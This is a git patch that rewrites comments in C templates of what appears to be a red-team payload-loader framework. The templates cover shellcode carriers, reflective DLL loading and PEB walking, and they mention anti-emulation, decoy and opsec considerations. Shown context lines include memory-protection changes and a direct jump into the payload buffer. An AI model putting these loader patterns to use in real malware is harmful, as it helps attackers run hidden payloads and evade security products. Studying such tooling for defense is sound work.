From ac0072260b32ed38fc95652165cb12e723ad3b61 Mon Sep 17 00:00:00 2001
From: Dobin Rutishauser
Date: Sat, 22 Jun 2024 18:09:02 +0200
Subject: [PATCH] refactor: improve comments
---
 data/source/carrier/alloc_rw_rwx/template.c | 7 +++---
 data/source/carrier/alloc_rw_rx/template.c | 3 +--
 data/source/carrier/change_rw_rx/template.c | 22 +++++--------------
 .../carrier/dll_loader_alloc/template.c | 5 +++--
 .../carrier/dll_loader_change/template.c | 5 +++--
 data/source/carrier/peb_walk/template.c | 4 +++-
 6 files changed, 19 insertions(+), 27 deletions(-)
diff --git a/data/source/carrier/alloc_rw_rwx/template.c b/data/source/carrier/alloc_rw_rwx/template.c
index 8239785..6a4ff0f 100644
--- a/data/source/carrier/alloc_rw_rwx/template.c
+++ b/data/source/carrier/alloc_rw_rwx/template.c
@@ -8,13 +8,14 @@ char *supermega_payload;
 #define p_RX 0x20
 #define p_RWX 0x40
-/* iat_reuse
- Standard IAT reuse shellcode
+/* VirtualAlloc -> rw -> rwx
+
  * create new memory region for the payload
- * will set it to RWX (safe to run shellcodes, opsec-unsafe)
+ * will set it to RWX (opsec-unsafe, allows in-memory decryption with sgn)
  */
+
 {{plugin_antiemulation}}
 {{plugin_decoy}}
diff --git a/data/source/carrier/alloc_rw_rx/template.c b/data/source/carrier/alloc_rw_rx/template.c
index 4723cc4..29f343c 100644
--- a/data/source/carrier/alloc_rw_rx/template.c
+++ b/data/source/carrier/alloc_rw_rx/template.c
@@ -16,9 +16,8 @@ char *supermega_payload;
 {{plugin_executionguardrail}}
-/* iat_reuse_rx
+/* VirtualAlloc -> rw -> rx
- Standard IAT reuse shellcode
  * create new memory region for the payload
  * will set it to RX (may break some shellcodes, opsec-safe)
  */
diff --git a/data/source/carrier/change_rw_rx/template.c b/data/source/carrier/change_rw_rx/template.c
index fb0eb65..99c2544 100644
--- a/data/source/carrier/change_rw_rx/template.c
+++ b/data/source/carrier/change_rw_rx/template.c
@@ -8,11 +8,12 @@ char *supermega_payload;
 #define p_RX 0x20
 #define p_RWX 0x40
-/* iat_reuse_rwx_rx
+/* change payload memory regions permissions
+ will reuse IMAGE locations
- IAT reuse shellcode
- * reuse payload location (both in .rdata and .text)
- * does (rw/rx) -> rwx -> rx
+ depending on payload injection:
+ * .text -> rw -> rx
+ * .rdata -> rw -> rx
  */
 {{plugin_antiemulation}}
@@ -38,13 +39,6 @@ int main()
 // Call: Decoy plugin
 decoy();
- // Note: RWX if carrier and payload are on the same page (or we cant exec copy..)
- // can do only RW otherwise?
- /*for(int n=0; n<({{PAYLOAD_LEN}}/4096)+1; n++) {
- if (VirtualProtect(dest + (n * 4096), 16, p_RWX, &result) == 0) {
- return 16;
- }
- }*/
 if (VirtualProtect(dest, {{PAYLOAD_LEN}}, p_RW, &result) == 0) {
 return 16;
 }
@@ -55,12 +49,6 @@ int main()
 return 16;
 }
- /*for(int n=0; n<{{PAYLOAD_LEN}}/4096; n++) {
- if (VirtualProtect(dest + (n * 4096), 16, p_RX, &result) == 0) {
- return 16;
- }
- }*/
-
 // Execute *dest
 (*(void(*)())(dest))();
diff --git a/data/source/carrier/dll_loader_alloc/template.c b/data/source/carrier/dll_loader_alloc/template.c
index f015eec..98523a1 100644
--- a/data/source/carrier/dll_loader_alloc/template.c
+++ b/data/source/carrier/dll_loader_alloc/template.c
@@ -10,8 +10,9 @@ char *supermega_payload;
 /* DLL loader
- This code will load a DLL (not a shellcode!) into memory,
- resolve its imports, apply relocations, and execute it.
+ This code will load a DLL (not a shellcode!)
+ into new memory region,
+ resolve its imports, apply relocations, and execute it.
 Loader is based on:
 https://www.ired.team/offensive-security/code-injection-process-injection/reflective-dll-injection
diff --git a/data/source/carrier/dll_loader_change/template.c b/data/source/carrier/dll_loader_change/template.c
index 2d1382c..59a9c6b 100644
--- a/data/source/carrier/dll_loader_change/template.c
+++ b/data/source/carrier/dll_loader_change/template.c
@@ -10,8 +10,9 @@ char *supermega_payload;
 /* DLL loader
- This code will load a DLL (not a shellcode!) into memory,
- resolve its imports, apply relocations, and execute it.
+ This code will load a DLL (not a shellcode!) into
+ existing memory region,
+ resolve its imports, apply relocations, and execute it.
 Loader is based on:
 https://www.ired.team/offensive-security/code-injection-process-injection/reflective-dll-injection
diff --git a/data/source/carrier/peb_walk/template.c b/data/source/carrier/peb_walk/template.c
index 24be0c6..08e275a 100644
--- a/data/source/carrier/peb_walk/template.c
+++ b/data/source/carrier/peb_walk/template.c
@@ -5,7 +5,9 @@ char *supermega_payload;
 /* peb_walk
- Standard shellcode which will resolve IAT by itself with a peb_walk
+ Standard shellcode which will resolve IAT by itself with a peb walk
+ no IAT reuse is performed
+ no data reuse is performed
 */
 int main()